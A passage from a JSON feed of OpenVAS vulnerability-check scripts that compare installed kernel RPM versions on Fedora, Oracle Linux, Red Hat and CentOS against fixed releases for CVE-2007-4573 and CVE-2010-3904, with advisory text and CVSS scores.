\"kernel on Fedora 7\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00375.html\");\n script_id(861315);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:01:32 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-2298\");\n script_cve_id(\"CVE-2007-4573\");\n script_name( \"Fedora Update for kernel FEDORA-2007-2298\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.22.7~85.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:19", "description": "Oracle Linux Local Security Checks ELSA-2007-0936", "cvss3": {}, "published": "2015-10-08T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2007-0936", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-4573"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122658", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122658", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2007-0936.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122658\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:50:24 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2007-0936\");\n script_tag(name:\"insight\", value:\"ELSA-2007-0936 - Important: kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2007-0936\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2007-0936.html\");\n script_cve_id(\"CVE-2007-4573\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~8.1.14.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~8.1.14.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~8.1.14.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~8.1.14.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~8.1.14.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~8.1.14.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~8.1.14.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~8.1.14.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~8.1.14.0.2.el5~1.2.6~6.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~8.1.14.0.2.el5PAE~1.2.6~6.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~8.1.14.0.2.el5xen~1.2.6~6.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~8.1.14.0.2.el5~2.0.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~8.1.14.0.2.el5PAE~2.0.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~8.1.14.0.2.el5xen~2.0.4~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-11T11:04:35", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-11-04T00:00:00", "type": "openvas", "title": "RedHat Update for kernel RHSA-2010:0792-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2018-01-10T00:00:00", "id": "OPENVAS:1361412562310870349", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870349", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2010:0792-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issue:\n\n * The rds_page_copy_user() function in the Linux kernel Reliable Datagram\n Sockets (RDS) protocol implementation was missing sanity checks. A local,\n unprivileged user could use this flaw to escalate their privileges.\n (CVE-2010-3904, Important)\n\n Red Hat would like to thank Dan Rosenberg of Virtual Security Research for\n reporting this issue.\n\n Users should upgrade to these updated packages, which contain a backported\n patch to correct this issue. The system must be rebooted for this update to\n take effect.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-October/msg00028.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870349\");\n script_version(\"$Revision: 8356 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 09:00:39 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-04 12:09:38 +0100 (Thu, 04 Nov 2010)\");\n script_xref(name: \"RHSA\", value: \"2010:0792-01\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3904\");\n script_name(\"RedHat Update for kernel RHSA-2010:0792-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for kernel CESA-2010:0792 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310880640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2010:0792 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2010-October/017121.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880640\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2010:0792\");\n script_cve_id(\"CVE-2010-3904\");\n script_name(\"CentOS Update for kernel CESA-2010:0792 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 5\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issue:\n\n * The rds_page_copy_user() function in the Linux kernel Reliable Datagram\n Sockets (RDS) protocol implementation was missing sanity checks. A local,\n unprivileged user could use this flaw to escalate their privileges.\n (CVE-2010-3904, Important)\n\n Red Hat would like to thank Dan Rosenberg of Virtual Security Research for\n reporting this issue.\n\n Users should upgrade to these updated packages, which contain a backported\n patch to correct this issue. The system must be rebooted for this update to\n take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-18T10:58:17", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-11-04T00:00:00", "type": "openvas", "title": "RedHat Update for kernel RHSA-2010:0792-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2017-12-18T00:00:00", "id": "OPENVAS:870349", "href": "http://plugins.openvas.org/nasl.php?oid=870349", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2010:0792-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issue:\n\n * The rds_page_copy_user() function in the Linux kernel Reliable Datagram\n Sockets (RDS) protocol implementation was missing sanity checks. A local,\n unprivileged user could use this flaw to escalate their privileges.\n (CVE-2010-3904, Important)\n\n Red Hat would like to thank Dan Rosenberg of Virtual Security Research for\n reporting this issue.\n\n Users should upgrade to these updated packages, which contain a backported\n patch to correct this issue. The system must be rebooted for this update to\n take effect.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-October/msg00028.html\");\n script_id(870349);\n script_version(\"$Revision: 8153 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-18 07:30:39 +0100 (Mon, 18 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-04 12:09:38 +0100 (Thu, 04 Nov 2010)\");\n script_xref(name: \"RHSA\", value: \"2010:0792-01\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3904\");\n script_name(\"RedHat Update for kernel RHSA-2010:0792-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", 